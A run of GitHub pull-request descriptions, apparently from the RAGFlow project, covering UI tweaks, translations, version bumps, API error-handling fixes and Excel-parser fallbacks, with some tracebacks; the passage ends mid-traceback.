support #3221
- Modified the VariableNode component to add parent label and icon
properties
- Updated the VariablePickerMenuPlugin to support displaying parent
labels and icons
- Adjusted useBuildNodeOutputOptions and useBuildBeginVariableOptions to
pass new properties
- Optimized the Agent TemplateCard component to switch the title and
description based on the language
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Use AvatarUpload to replace the avatar settings on the dataset and
search pages #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR enhances the display of tags in the UI.
* Before: Model tags were shown as a single string with commas.
* After: Model tags are split by commas and displayed as individual
<Tag> components , making them visually distinct and easier to read.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
The agent directly outputs the results under the task model #9745
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Fix Add Russian language.
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add AvatarUpload component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Updates the installation step in README.md to explicitly include
pre-commit alongside uv.
Applies the change to all localized versions: English, Chinese,
Japanese, Korean, Indonesian, and Portuguese.
#### Why this is needed:
The installation instructions previously mentioned only uv, but
pre-commit is also required for contributing.
Ensures consistency across all language versions and helps new
contributors set up the environment correctly.
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Revert broken agent completion by #9631.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Update version tags in README files (including translations) from
v0.20.3 to v0.20.4
- Modify Docker image references and documentation to reflect new
version
- Update version badges and image descriptions
- Maintain consistency across all language variants of README files
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Fix: Optimize the MultiSelect component and system prompt templates
#3221
- Modify the conditional statements in the MultiSelect component, using
the ?. operator to improve code readability
- Optimize the formatting of the system prompt template to make it more
standardized and easier to read
- Update the Chinese translation, changing "ExeSQL" to "Execute SQL"
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Fix: Fixed the issue that the agent embedded page needs to be logged in
#9750
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Optimize tooltips and I118n #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Fix(i18n): Added new translations #3221
- Added and updated internationalization translations in multiple
components
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Fix: After deleting the knowledge graph, jump to the dataset page #9722
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Try to fix the issue of not being able to log in through Oauth2
#9601
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add Zhipu GLM-4.5 model series. #9708.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
add ZhipuAI GLM-4.5 model series
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Chunk error when re-parsing created file
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
for total_token_count method use if to check first, to improve the
performance when we need to handle exception cases
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Fix: Optimize table style
-Modify the style of the table scrollbar and remove unnecessary
scrollbars
-Adjust the header style of the table, add background color and
hierarchy
-Optimize the style of datasets and file tables
-Add a new background color variable
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Delete the uploaded file in the chat input box, the corresponding
file ID is not deleted #9701
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Update API endpoint paths in docs from `/v1/` to `/api/v1/` for
consistency
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
This PR fixes a critical bug in the session listing endpoint where the
application crashes with an `AttributeError` when processing chunk data
that contains non-dictionary objects.
**Error before fix:**
```json
{
"code": 100,
"data": null,
"message": "AttributeError(\"'str' object has no attribute 'get'\")"
}
```
**Root cause:**
The code assumes all items in the `chunks` array are dictionary objects
and directly calls the `.get()` method on them. However, in some cases,
the chunks array contains string objects or other non-dictionary types,
causing the application to crash when attempting to call `.get()` on a
string.
**Solution:**
Added type validation to ensure each chunk is a dictionary before
processing. Non-dictionary chunks are safely skipped, preventing the
crash while maintaining functionality for valid chunk data.
This fix improves the robustness of the session listing endpoint and
ensures users can retrieve their conversation sessions without
encountering server errors due to data format inconsistencies.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Optimize dataset page layout and internationalization and Fix
setting default values for multi selection drop-down boxes #3221
-Adjust the style and layout of each component on the dataset page
-Add and update multilingual translation content
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
When create conversation,the prologue hasn't save in conversation.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix Multiple conversations cause the reference list to grow indefinitely
due to Python's mutable default argument behavior.
Explicitly initialize reference as empty list when creating new sessions
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Exclude operator_permission field from renaming chat fields #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
The VersionDialog component was not receiving the correct context for
dropdown handling, causing improper behavior in its interactions.
This PR wraps VersionDialog in DropdownProvider to ensure it gets the
proper context and functions as expected.
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Place the invitation reminder icon in a separate file #9634
Fix: After receiving the agent message, pull the agent data to highlight
the edges passed #9538
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Search app AI summary ERROR And The tag set cannot be selected
#9649#9652
- Search app AI summary ERROR: 'dict' object has no attribute 'split'
#9649
- fix The tag set cannot be selected in the knowledge base. #9652
- Added custom parameter options to the LlmSettingFieldItems component
- Adjusted the document preview height to improve page layout
adaptability
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Display the invited icon in the header #9634
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix search app AI summary ERROR: 'dict' object has no attribute 'split'.
#9649
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Resolve#9549 and #9436 , In v0.20.x,Agent completions API changed a
lot,such as without reference and so on
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Fix: Document Previewer is not working #9606
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
based on async await to handle Redis when raptor
### Type of change
- [x] Refactoring
- [x] Performance Improvement
### What problem does this PR solve?
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
Removed a line break causing problems with execution in Raptor.
### What problem does this PR solve?
When I activate Raptor without changing anything in French, I encounter
a problem that I don't have with the English version. I noticed in the
logs that there was an extra line break, so I suggest removing it.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed an issue where knowledge base could not be shared #9634
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: The buttons at the bottom of the dataset settings page are not
visible on small screens #9638
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
fix(dataset): data form data acquisition logic
fix(next-chats): Optimize the chat settings interface and add language
selection
- Replace form.formControl.trigger with form.trigger
- Use form.getValues() instead of form.formState.values
- Add language selection to support multiple languages
- Add default chat settings values
- Add new settings: icon, description, knowledge base ID, etc.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Fixes (web): Optimized search page style and functionality #3221
- Updated search page and view title styles
- Modified dataset list and multi-select control styles
- Optimized text field and button styles
- Updated filter button icons
- Adjusted metadata filter styles
- Added default descriptions for the smart assistant
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Bump infinity-sdk dependency to the latest development version
(0.6.0.dev5) in both pyproject.toml and uv.lock files to incorporate
recent changes and fixes from the SDK.
### Type of change
- [x] Other (please describe): Update deps
### What problem does this PR solve?
Feat: Allow users to parse documents directly after uploading files
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix (style): Optimized Datasets color scheme and layout #3221
- Updated background and text colors for multiple components
- Adjusted some layout structures, such as the paging position of
dataset tables
- Unified status icons and color mapping
- Optimized responsive layout to improve compatibility across different
screen sizes
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Remove the file size and quantity restrictions of the upload
control #9613#9598
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feature (web): Optimize dataset pages and segmented components #3221
-Add the activeClassName property to Segmented components to customize
the selected state style
-Update the icons and captions of the relevant components on the dataset
page
-Modify the parsing status column title of the dataset table
-Optimize the Segmented component style of the homepage application
section
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Expand the capabilities of the MCP Server. #8644.
Special thanks to @Drasek, this change is largely based on his original
implementation, it is super neat and well-structured to me. I basically
just integrated his code into the codebase with minimal modifications.
My main contribution is implementing a proper cache layer for dataset
and document metadata, using the LRU strategy with a 300s ± random 30s
TTL. The original code did not actually perform caching.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Caspar Armster <caspar@armster.de>
### What problem does this PR solve?
Feat: Updated some colors according to the design draft #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix (web): Optimize text display effect
-Add text ellipsis and overflow hidden classes to the HomeCard component
to achieve text overflow hiding and ellipsis effects
-Add text ellipsis and overflow hidden classes to the DatasetSidebar
component to improve the display of dataset names
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the issue where the save button at the bottom of the chat
page could not be displayed on small screens #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
When the `dataset_ids` parameter is omitted in the **update assistant**
request, Passing an empty array `[]` triggers a misleading
message"Dataset use different embedding models", while omitting the
field does not.
To fix this, we:
- Provide a default empty list: `ids = req.get("dataset_ids", [])`.
- Replace the `is not None` check with a truthy check: `if ids:`.
**Files changed**
`api/apps/sdk/chat.py`
- L153: `ids = req.get("dataset_ids")` → `ids = req.get("dataset_ids",
[])`
- L156: `if ids is not None:` → `if ids:`
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix (web): Update the style of segmented controls and add metallic
texture gradients #3221
-Modified the selected state style of Segmented components, adding
metallic texture gradient and lower border
-Added a metallic gradient background image in tailwind.diag.js
-Added the -- metallic variable in tailwind.css to define metallic
texture colors
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
In 0.19.0 reference is list,and it should be a list,otherwise last
conversation's reference will be lost
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Make the old page accessible via URL #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Update version tags in README files (including translations) from
v0.20.2 to v0.20.3
- Modify Docker image references and documentation to reflect new
version
- Update version badges and image descriptions
- Maintain consistency across all language variants of README files
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Fix: Fixed the issue where the model configuration page could not be
scrolled #9572
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix home card not responding to click events
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Fix (next search): Optimize the search problem interface and related
functions #3221
-Add search_id to the retrievval_test interface
-Optimize handleSearchStrChange and handleSearch callbacks to determine
whether to enable AI search based on search configuration
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Reset all data except the first one on the chat page shared with
others #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed an issue where renaming a chat would create a new chat #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Switch the root route to the new page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix (search): Search application list supports renaming function #3221
-Update the search application list page and add a renaming operation
entry
-Modify the search application details interface to support obtaining
detailed information
-Optimize search settings page layout and style
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Update version tags in README files (including translations) from
v0.20.1 to v0.20.2
- Modify Docker image references and documentation to reflect new
version
- Update version badges and image descriptions
- Maintain consistency across all language variants of README files
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Fix: Fixed the issue where clicking the SQL tool test button did not
request the interface #9541
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Refactor OpenAI to enable audio parsing.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Refactoring
### What problem does this PR solve?
Allow Retrieval kb_ids param use kb_id,and allow list kb_name or kb_id。
- Add judgment on whether the knowledge base name is a list and support
batch queries
-When the knowledge base name does not exist, try using the ID for
querying
-If both query methods fail, throw an exception
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Move stop_event.wait(6) into finally block so that even when an
exception occurs, the loop still sleeps before retrying. This prevents
busy looping and excessive error logs when Redis connection fails.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Allow agent operators to select speech-to-text models #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
feat(search): Optimized search functionality and user interface #3221
### Type of change
- Added similarity threshold adjustment function
- Optimized mind map display logic
- Adjusted search settings interface layout
- Fixed related search and document viewing functions
- Optimized time display and node selection logic
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Update search_app.py to use SearchService instead of
KnowledgebaseService for duplicate
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Displays the embedded page of the chat module #3221
Feat: Let the agen operator support the selection of tts model #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix Gemini parameters error.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Fix (search): Optimize the search page functionality and UI #3221
- Add a search list component
- Implement search settings
- Optimize search result display
- Add related search functionality
- Adjust the search input box style
- Unify internationalized text
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add embedded search functionality.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
- Update httpx dependency to include socks support in pyproject.toml
- Update lockfile with new socksio dependency
### Type of change
- [x] Update dependencies for proxy support
### What problem does this PR solve?
Feat: Fixed the chat model setting echo issue
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
1. Use input length to prepare res
2. Adjust torch_empty_cache code location
### Type of change
- [x] Refactoring
- [x] Performance Improvement
### What problem does this PR solve?
There is a problem with the implementation of the Agent begin-form:
although the enablePrologue switch and the prologue input box are hidden
in Task mode, these values are still saved in the form data. If the user
first enables the opening and sets the content in Conversational mode,
and then switches to Task mode, these values will still be saved and may
be used in some scenarios.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
feat(search): Added app embedding functionality and optimized search
page #3221
- Added an Embed App button and related functionality
- Optimized the layout and interaction of the search settings interface
- Adjusted the search result display method
- Refactored some code to support new features
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add SMTP support for user invitation emails
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Conversation completion can specify different model
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add metadata configuration for new chats #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Handle unexpected truncated Excel files.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- Unified configuration format: All services now use the same image
configuration structure for consistency.
- Private registry support: Added imagePullSecrets to enable pulling
images from private registries.
- Per-service flexibility: Each service can override image-related
parameters independently.
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
When calling HTTP to request data, if the JSON string returned by the
interface contains an unasked back slash like '\u', Python's RE module
will escape 'u' as Unicode, but there is no valid 4-digit hexadecimal
number at the end, so it will directly report an error. Error: re.
error: bad escape \ u at position 26
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Delete or filter conversations #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Upload files in the chat box #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
…e connecting line (#9226)
### What problem does this PR solve?
Can directly generate an agent node by dragging and dropping the
connecting line (#9226)
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
fix: preserve correct MIME & unify data URL handling for vision inputs
(relates #9248)
- Updated image2base64() to return a full data URL
(data:image/<fmt>;base64,...) with accurate MIME
- Removed hardcoded image/jpeg in Base._image_prompt(); pass through
data URLs and default raw base64 to image/png
- Set AnthropicCV._image_prompt() raw base64 media_type default to
image/png
- Ensures MIME type matches actual image content, fixing “cannot process
base64 image” errors on vLLM/OpenAI-compatible backends
### What problem does this PR solve?
This PR fixes a compatibility issue where base64-encoded images sent to
vision models (e.g., vLLM/OpenAI-compatible backends) were rejected due
to mismatched MIME type or incorrect decoding.
Previously, the backend:
- Always converted raw base64 into data:image/jpeg;base64,... even if
the actual content was PNG.
- In some cases, base64 decoding was attempted on the full data URL
string instead of the pure base64 part.
This caused errors like:
```
cannot process base64 image
failed to decode base64 string: illegal base64 data at input byte 0
```
by strict validators such as vLLM.
With this fix, the MIME type in the request now matches the actual image
content, and data URLs are correctly handled or passed through, ensuring
vision models can decode and process images reliably.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Send data to compare the performance of different models' answers
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Agent template: report agent using knowledge base
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
feat(next-search): Implements document preview functionality
- Adds a new document preview modal component
- Implements document preview page logic
- Adds document preview-related hooks
- Optimizes document preview rendering logic
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
KB folder may not there while creating virtual file. #9423
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Display a separate chat multi-model comparison page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Make `session_id` optional and add `inputs` parameter
- Remove deprecated `sync_dsl` parameter
- Update request/response examples to match current API behavior
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Update broken create agent session due to v0.20.0 changes. #9383
**NOTE: A session ID is no longer required to interact with the agent.**
See: #9241, #9309.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Show multiple chat boxes #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add `url`, `doc_type`, and `created_at` fields to the API response
example in the documentation.
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Feat: Fixed the issue where some fields in the chat configuration could
not be displayed #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Allows set multiple types of default models in service config.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- Add type and boundary checks for conv["reference"] access
- Prevent KeyError: 0 when reference list is empty or malformed
- Ensure reference is list type before indexing
- Handle cases where reference items are None or missing chunks
- Maintains backward compatibility with existing data structures
This resolves crashes in /api/v1/agents/<agent_id>/sessions endpoint
when conversation reference data is not properly structured.
### What problem does this PR solve?
This PR fixes a critical `KeyError: 0` that occurs in the
`/api/v1/agents/<agent_id>/sessions` endpoint when the system attempts
to access conversation reference data that is not properly structured.
**Background Context:**
The `list_agent_session` method in `api/apps/sdk/session.py` assumes
that `conv["reference"]` is always a properly indexed list with valid
dictionary structures. However, in real-world scenarios, this data can
be:
- Not a list type (could be None, string, or other types)
- An empty list when `chunk_num` tries to access index 0
- Contains None values or malformed dictionary structures
- Missing expected "chunks" keys in reference items
**Impact Before Fix:**
When malformed reference data is encountered, the API crashes with:
```json
{
"code": 100,
"data": null,
"message": "KeyError(0)"
}
```
**Solution:**
Added comprehensive safety checks including type validation, boundary
checking, null safety, and structure validation to ensure the API
gracefully handles all reference data formats while maintaining backward
compatibility.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Change return type of _generate_streamly from str to Generator[str,
None, None] to properly type hint streaming responses.
### Type of change
- [x] Refactoring
### What problem does this PR solve?
when begin component has optional file but not exist , it rase error
### Type of change
- [x] Bug Fix
Co-authored-by: Popmio <zhengyihao036@gamil.com>
### What problem does this PR solve?
Feat: Added meta data to the chat configuration page #8531
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
fix "File contains no valid workbook part"
stacktrace:
```
Traceback (most recent call last):
File "/ragflow/deepdoc/parser/excel_parser.py", line 54, in _load_excel_to_workbook
return RAGFlowExcelParser._dataframe_to_workbook(df)
File "/ragflow/deepdoc/parser/excel_parser.py", line 69, in _dataframe_to_workbook
ws.cell(row=row_num, column=col_num, value=value)
File "/ragflow/.venv/lib/python3.10/site-packages/openpyxl/worksheet/worksheet.py", line 246, in cell
cell.value = value
File "/ragflow/.venv/lib/python3.10/site-packages/openpyxl/cell/cell.py", line 218, in value
self._bind_value(value)
File "/ragflow/.venv/lib/python3.10/site-packages/openpyxl/cell/cell.py", line 197, in _bind_value
value = self.check_string(value)
File "/ragflow/.venv/lib/python3.10/site-packages/openpyxl/cell/cell.py", line 165, in check_string
raise IllegalCharacterError(f"{value} cannot be used in worksheets.")
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Before executing the SQL, remove tags in the format [ID: number] to
avoid execution errors.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: wangyazhou <wangyazhou@sdibd.cn>
### What problem does this PR solve?
add fallback to `calamine` engine when parse error raised using the
default `openpyxl` / `xlrd` engine.
e.g. the following error can be fixed:
```
Traceback (most recent call last):
File "/ragflow/deepdoc/parser/excel_parser.py", line 53, in _load_excel_to_workbook
df = pd.read_excel(file_like_object)
File "/ragflow/.venv/lib/python3.10/site-packages/pandas/io/excel/_base.py", line 495, in read_excel
io = ExcelFile(
File "/ragflow/.venv/lib/python3.10/site-packages/pandas/io/excel/_base.py", line 1567, in __init__
self._reader = self._engines[engine](
File "/ragflow/.venv/lib/python3.10/site-packages/pandas/io/excel/_xlrd.py", line 46, in __init__
super().__init__(
File "/ragflow/.venv/lib/python3.10/site-packages/pandas/io/excel/_base.py", line 573, in __init__
self.book = self.load_workbook(self.handles.handle, engine_kwargs)
File "/ragflow/.venv/lib/python3.10/site-packages/pandas/io/excel/_xlrd.py", line 63, in load_workbook
return open_workbook(file_contents=data, **engine_kwargs)
File "/ragflow/.venv/lib/python3.10/site-packages/xlrd/__init__.py", line 172, in open_workbook
bk = open_workbook_xls(
File "/ragflow/.venv/lib/python3.10/site-packages/xlrd/book.py", line 68, in open_workbook_xls
bk.biff2_8_load(
File "/ragflow/.venv/lib/python3.10/site-packages/xlrd/book.py", line 641, in biff2_8_load
cd.locate_named_stream(UNICODE_LITERAL(qname))
File "/ragflow/.venv/lib/python3.10/site-packages/xlrd/compdoc.py", line 398, in locate_named_stream
result = self._locate_stream(
File "/ragflow/.venv/lib/python3.10/site-packages/xlrd/compdoc.py", line 429, in _locate_stream
raise CompDocError("%s corruption: seen[%d] == %d" % (qname, s, self.seen[s]))
xlrd.compdoc.CompDocError: Workbook corruption: seen[2] == 4
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/9385
Based on my understanding, I think checking empty string is fine
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
feat(next-search): Added AI summary functionality #3221
- Added the LlmSettingFieldItems component for AI summary settings
- Updated the SearchSetting component to integrate AI summary
functionality
- Added the updateSearch hook and related service methods
- Modified the ISearchAppDetailProps interface to add the llm_setting
field
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
All models pass the mock response tests, which means that if a model can
return the correct response, everything should work as expected.
However, not all models have been fully tested in a real environment,
the real API_KEY. I suggest actively monitoring the refactored models
over the coming period to ensure they work correctly and fixing them
step by step, or waiting to merge until most have been tested in
practical environment.
### Type of change
- [x] Refactoring
### What problem does this PR solve?
- Fix error message assertion in test_update_chunk.py to match new
ownership validation
- Simplify dataset listing test cases by removing lambda assertions for
sorting
- Fix actions:
https://github.com/infiniflow/ragflow/actions/runs/16885465524/job/47831942553
### Type of change
- [x] Fix test cases
### What problem does this PR solve?
Python class Document was missing "meta_fields", e.g. when querying, the
document instances came without meta_fields
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Allow chat to use meta data #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Using the mcp server in n8n sometimes (with smaller models) results in
errors because the llm misses a char or adds one to the list of
dataset_ids provided. It first asks for the list of datasets and if you
got a larger list of them it makes a error recalling the list
completely. So adding the feature to just search through all available
datasets solves this and makes the retrieval of data more stable. The
functionality to just call special datasets by id is not changed, the
dataset_ids are now not required anymore (only the "question" is). You
can provide (like before) a list of datasets, a empty list or no list at
all.
### Type of change
- [X] New Feature (non-breaking change which adds functionality)
<img width="1897" height="880" alt="mcp error dataset id"
src="https://github.com/user-attachments/assets/71076d24-f875-4663-a69a-60839fc7a545"
/>
Fixes an issue where running the sandbox (code component) fails due to
unresolved hostnames. Added missing service names (es01, infinity,
mysql, minio, redis) to 127.0.0.1 in the /etc/hosts example.
Reference: https://github.com/infiniflow/ragflow/issues/8226
## What this PR does
Updates the sandbox quickstart documentation to fix a known issue where
the sandbox fails to resolve required service hostnames.
## Why
Following the original instruction leads to a `Failed to resolve 'none'`
error, as discussed in issue #8226. Adding the missing service names to
`127.0.0.1` resolves the problem.
## Related issue
https://github.com/infiniflow/ragflow/issues/8226
## Note
It might be better to add `127.0.0.1 es01 infinity mysql minio redis` to
docs/quickstart.mdx, but since no issues appeared at the time without
adding this line—and the problem occurred while working with the code
component—I added it here.
### Type of change
- [X] Documentation Update
- Root cause: accessing req.get("dataset_ids") returns None when the key
is absent, causing KeyError.
- Fix: use req.get("dataset_ids", []) to default to empty list.
### What problem does this PR solve?
- Modify error message assertion in chunk update test to check for
document ownership
- Add GraphRAG configuration with `use_graphrag: False` in dataset
update tests
- Fix actions:
https://github.com/infiniflow/ragflow/actions/runs/16863637898/job/47767511582
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- The default dataset_ids "kb1" was removed from the Chat class.
- The HTTP API response does not include the dataset_ids field.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add full list of supported AWS Bedrock regions.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
fix "no `tc` element at grid_offset", just log warning and ignore.
stacktrace:
```
Traceback (most recent call last):
File "/ragflow/rag/svr/task_executor.py", line 620, in handle_task
